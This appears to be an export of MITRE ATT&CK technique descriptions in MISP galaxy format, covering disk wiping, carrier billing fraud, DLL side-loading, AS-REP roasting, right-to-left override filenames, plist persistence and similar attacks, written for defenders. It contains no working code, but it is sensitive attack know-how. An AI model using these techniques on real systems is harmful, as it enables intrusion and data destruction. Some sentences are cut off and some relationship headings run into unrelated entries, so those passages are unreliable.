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<td><a href="https://attack.mitre.org/techniques/T1454">https://attack.mitre.org/techniques/T1454</a></td>
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Supply Chain Compromise - T1474

As further described in [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195), supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Somewhat related, adversaries could also identify and exploit inadvertently present vulnerabilities. In many cases, it may be difficult to be certain whether exploitable functionality is due to malicious intent or simply inadvertent mistake.

Third-party libraries incorporated into mobile apps could contain malicious behavior, privacy-invasive behavior, or exploitable vulnerabilities. An adversary could deliberately insert malicious behavior or could exploit inadvertent vulnerabilities. For example, security issues have previously been identified in third-party advertising libraries incorporated into apps.(Citation: NowSecure-RemoteCode)(Citation: Grace-Advertisement).

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1474"

Table 3450. Table References

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Delete Device Data - T1447

Adversaries may wipe a device or delete individual files in order to manipulate external outcomes or hide activity. An application must have administrator access to fully wipe the device, while individual files may not require special permissions to delete depending on their storage location. (Citation: Android DevicePolicyManager 2019)
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The impact file deletion will have depends on the type of data as well as the goals and objectives of the adversary, but can include deleting update files to evade detection or deleting attacker-specified files for impact.

The tag is: misp-galaxy:mitre-attack-pattern="Delete Device Data - T1447"

---

### Carrier Billing Fraud - T1448

A malicious app may trigger fraudulent charges on a victim’s carrier billing statement in several different ways, including SMS toll fraud and SMS shortcodes that make purchases.

Performing SMS fraud relies heavily upon the fact that, when making SMS purchases, the carriers perform device verification but not user verification. This allows adversaries to make purchases on behalf of the user, with little or no user interaction. (Citation: Google Bread)

Malicious applications may also perform toll billing, which occurs when carriers provide payment endpoints over a web page. The application connects to the web page over cellular data so the carrier can directly verify the number, or the application must retrieve a code sent via SMS and enter it into the web page. (Citation: Google Bread)

On iOS, apps cannot send SMS messages.

On Android, apps must hold the SEND_SMS permission to send SMS messages. Additionally, Android version 4.2 and above has mitigations against this threat by requiring user consent before allowing SMS messages to be sent to premium numbers (Citation: AndroidSecurity2014).

The tag is: misp-galaxy:mitre-attack-pattern="Carrier Billing Fraud - T1448"

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### Domain Policy Modification - T1484

Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a
network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.

With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).

Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484"

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## Runtime Data Manipulation - T1494

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding,
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1042) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: **misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1494"**

Runtime Data Manipulation - T1494 has relationships with:

- revoked-by: **misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003"** with estimative-language:likelihood-probability="almost-certain"

### Table 3454. Table References

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### Exploit Baseband Vulnerability - T1455

A message sent over a radio interface (typically cellular, but potentially Bluetooth, GPS, NFC, Wi-Fi or other) to the mobile device could exploit a vulnerability in code running on the device.

1. Komaromy and N. Golde demonstrated baseband exploitation of a Samsung mobile device at the PacSec 2015 security conference (Citation: Register-BaseStation).

Weinmann described and demonstrated "the risk of remotely exploitable memory corruptions in cellular baseband stacks." (Citation: Weinmann-Baseband)

Platforms: Android, iOS

The tag is: **misp-galaxy:mitre-attack-pattern="Exploit Baseband Vulnerability - T1455"**

Exploit Baseband Vulnerability - T1455 has relationships with:

- revoked-by: **misp-galaxy:mitre-attack-pattern="Exploit via Radio Interfaces - T1477"** with estimative-language:likelihood-probability="almost-certain"

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Event Triggered Execution - T1546

Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries.

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via repeatedly executing malicious code. After gaining access to a victim system, adversaries may create/modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.(Citation: FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia malware)

Since the execution can be proxied by an account with higher permissions, such as SYSTEM or service accounts, an adversary may be able to abuse these triggered execution mechanisms to escalate their privileges.

The tag is: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546"

Table 3456. Table References

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Malicious Media Content - T1457

Content of a media (audio or video) file could be designed to exploit vulnerabilities in parsers on the mobile device, as for example demonstrated by the Android Stagefright vulnerability (Citation: Zimperium-Stagefright).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Media Content - T1457"

Malicious Media Content - T1457 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1456" with estimative-language:likelihood-probability="almost-certain"

Table 3457. Table References

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<td><a href="https://attack.mitre.org/techniques/T1457">https://attack.mitre.org/techniques/T1457</a></td>
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1506
Hijack Execution Flow - T1574

Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.

There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574"

Table 3458. Table References

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<td><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns">https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</a></td>
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Disk Structure Wipe - T1487

Adversaries may corrupt or wipe the disk data structures on hard drive necessary to boot systems; targeting specific critical systems as well as a large number of systems in a network to interrupt availability to system and network resources.

Adversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/T1487) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/techniques/T1488) if all sectors of a disk are wiped.

To maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1487"

Disk Structure Wipe - T1487 has relationships with:
Disk Content Wipe - T1488

Adversaries may erase the contents of storage devices on specific systems as well as large numbers of systems in a network to interrupt availability to system and network resources.

Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface. (Citation: Novetta Blockbuster) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data. (Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content. This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk erased instead of individual files.

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [Credential Dumping](https://attack.mitre.org/techniques/T1003), and [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). (Citation: Novetta Blockbuster Destructive Malware)

The tag is: `misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1488"`

Disk Content Wipe - T1488 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.001"` with estimative-language:likelihood-probability="almost-certain"
Modify Authentication Process - T1556

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The tag is: misp-galaxy:mitre-attack-pattern="Modify Authentication Process - T1556"

Table 3461. Table References

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<td><a href="https://attack.mitre.org/techniques/T1556">https://attack.mitre.org/techniques/T1556</a></td>
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<td><a href="https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/">https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/</a></td>
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<td><a href="https://www.secureworks.com/research/skeleton-key-malware-analysis">https://www.secureworks.com/research/skeleton-key-malware-analysis</a></td>
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<td><a href="https://xorrior.com/persistent-credential-theft/">https://xorrior.com/persistent-credential-theft/</a></td>
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Uninstall Malicious Application - T1576

Adversaries may include functionality in malware that uninstalls the malicious application from the device. This can be achieved by:

- Abusing device owner permissions to perform silent uninstallation using device owner API calls.
- Abusing root permissions to delete files from the filesystem.
Abusing the accessibility service. This requires an intent be sent to the system to request uninstallation, and then abusing the accessibility service to click the proper places on the screen to confirm uninstallation.

The tag is: `misp-galaxy:mitre-attack-pattern="Uninstall Malicious Application - T1576"`

### Compromise Application Executable - T1577

Adversaries may modify applications installed on a device to establish persistent access to a victim. These malicious modifications can be used to make legitimate applications carry out adversary tasks when these applications are in use.

There are multiple ways an adversary can inject malicious code into applications. One method is by taking advantages of device vulnerabilities, the most well-known being Janus, an Android vulnerability that allows adversaries to add extra bytes to APK (application) and DEX (executable) files without affecting the file's signature. By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user's knowledge. (Citation: Guardsquare Janus)

Adversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it. (Citation: CheckPoint Agent Smith)

Adversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application. (Citation: CheckPoint Agent Smith)

The tag is: `misp-galaxy:mitre-attack-pattern="Compromise Application Executable - T1577"`

### Search Closed Sources - T1597

Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private
sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. (Citation: D3Security CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. (Citation: ZDNET Selling Data)

Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).

The tag is: *misp-galaxy:mitre-attack-pattern="Search Closed Sources - T1597"

### Table 3464. Table References

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<td><a href="https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/">https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/</a></td>
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### Phishing for Information - T1598

Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.

All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.

Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means. (Citation: ThreatPost Social Media Phishing)(Citation: TrendMicro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.

The tag is: *misp-galaxy:mitre-attack-pattern="Phishing for Information - T1598"

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Table 3465. Table References
Network Boundary Bridging - T1599

Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks. They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections. Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications. To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.

When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance. By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001). In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.

The tag is: **misp-galaxy:mitre-attack-pattern="Network Boundary Bridging - T1599"**

**Table 3466. Table References**

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At (Linux) - T1053.001

Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks. (Citation: Kifarunix - Task Scheduling in Linux)

An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.

The tag is: *misp-galaxy:mitre-attack-pattern="At (Linux) - T1053.001"*

**Table 3467. Table References**

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At (Windows) - T1053.002

Adversaries may abuse the `<code>at.exe</code>` utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.

An adversary may use `<code>at.exe</code>` in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).

Note: The `<code>at.exe</code>` command line utility has been deprecated in current versions of Windows in favor of `<code>schtasks</code>`.

The tag is: *misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002"*

**Table 3468. Table References**

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Mark-of-the-Web Bypass - T1553.005

Adversaries may abuse specific file formats to subvert Mark-of-the-Web (MOTW) controls. In Windows, when files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named `<code>Zone.Identifier</code>` with a specific value known as the MOTW. Files that are tagged with MOTW are protected and cannot perform certain actions. For example, starting in MS Office 10, if a MS Office file has the MOTW, it will open in Protected View. Executables tagged with the MOTW will be processed by Windows Defender SmartScreen that compares files with an allowlist of well-known executables. If the file in not known/trusted, SmartScreen will prevent the execution and warn the user not to run it.

Adversaries may abuse container files such as compressed/archive (.arj, .gzip) and/or disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW. Container files downloaded from the Internet will be marked with MOTW but the files within may not inherit the MOTW after the container files are extracted and/or mounted. MOTW is a NTFS feature and many container files do not support NTFS alternative data streams. After a container file is extracted and/or mounted, the files contained within them may be treated as local files on disk and run without protections.

The tag is: `misp-galaxy:mitre-attack-pattern="Mark-of-the-Web Bypass - T1553.005"`

Table 3469. Table References

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Right-to-Left Override - T1036.002

Adversaries may use the right-to-left override (RTLO or RLO) character (U+202E) as a means of tricking a user into executing what they think is a benign file type but is actually executable code. RTLO is a non-printing character that causes the text that follows it to be displayed in reverse. For example, a Windows screensaver executable named `<code>March 25 \u202Ercs.docx</code>` will display as `<code>March 25 rcs.docx</code>`. A JavaScript file named `<code>photo_high_re\u202Egnp.js</code>` will be
A common use of this technique is with [Spearphishing Attachment](https://attack.mitre.org/techniques/T1204/002) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity. (Citation: Trend Micro PLEAD RTLO)(Citation: Kaspersky RTLO Cyber Crime) RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

The tag is: `misp-galaxy:mitre-attack-pattern="Right-to-Left Override - T1036.002"`

### Multi-hop Proxy - T1090.003

To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)

In the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization's WAN. Protocols such as ICMP may be used as a transport.

The tag is: `misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003"`

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One-Way Communication - T1102.003

Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.

Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

The tag is: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003"

Drive-by Target - T1608.004

Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including inserting malicious script into web pages or other user controllable web content such as forum posts. Adversaries may also craft malicious web advertisements and purchase ad space on a website through legitimate ad providers. In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather
Victim Host Information to ensure it is vulnerable prior to attempting exploitation. (Citation: ATT ScanBox)

Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to as a strategic web compromise or watering hole attack.

Adversaries may purchase domains similar to legitimate domains (ex: homographs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure to help facilitate Drive-by Compromise to help facilitate Drive-by Compromise.

The tag is: `misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004"

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Non-Standard Encoding - T1132.002

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding)

The tag is: `misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002"

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SID-History Injection - T1134.005

Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).

With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).

The tag is: `misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005"`

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<td><a href="https://msdn.microsoft.com/library/ms677982.aspx">https://msdn.microsoft.com/library/ms677982.aspx</a></td>
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DLL Side-Loading - T1574.002

Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).

Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL...
Side-Loading)

The tag is: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002"

Table 3476. Table References

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AS-REP Roasting - T1558.004

Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017)

Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user's password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user's password.(Citation: Microsoft Kerberos Preauth 2014)

For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
The tag is: `misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004"`

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**Re-opened Applications - T1547.007**

Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at `<code>~/Library/Preferences/com.apple.loginwindow.plist</code>` and `<code>~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist</code>.

An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).

The tag is: `misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1547.007"`

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**Obtain/re-use payloads - T1346**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1346).

A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available. (Citation: SonyDestover)
Multi-Stage Channels - T1104

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.

DLL Side-Loading - T1073

Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: MSDN Manifests) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. (Citation: Stewart 2014)

Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.

The tag is: *misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1073"*

DLL Side-Loading - T1073 has relationships with:

Command-Line Interface - T1605

Adversaries may use built-in command-line interfaces to interact with the device and execute commands. Android provides a bash shell that can be interacted with over the Android Debug Bridge (ADB) or programmatically using Java's `Runtime` package. On iOS, adversaries can interact with the underlying runtime shell if the device has been jailbroken.

If the device has been rooted or jailbroken, adversaries may locate and invoke a superuser binary to elevate their privileges and interact with the system as the root user. This dangerous level of permissions allows the adversary to run special commands and modify protected system files.

The tag is: `misp-galaxy:mitre-attack-pattern="Command-Line Interface - T1605"`

Re-opened Applications - T1164

Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at `<code>~/Library/Preferences/com.apple.loginwindow.plist</code>` and `<code>~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist</code>`.

An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).

The tag is: `misp-galaxy:mitre-attack-pattern="Re-opened Applications - T1164"

Re-opened Applications - T1164 has relationships with:

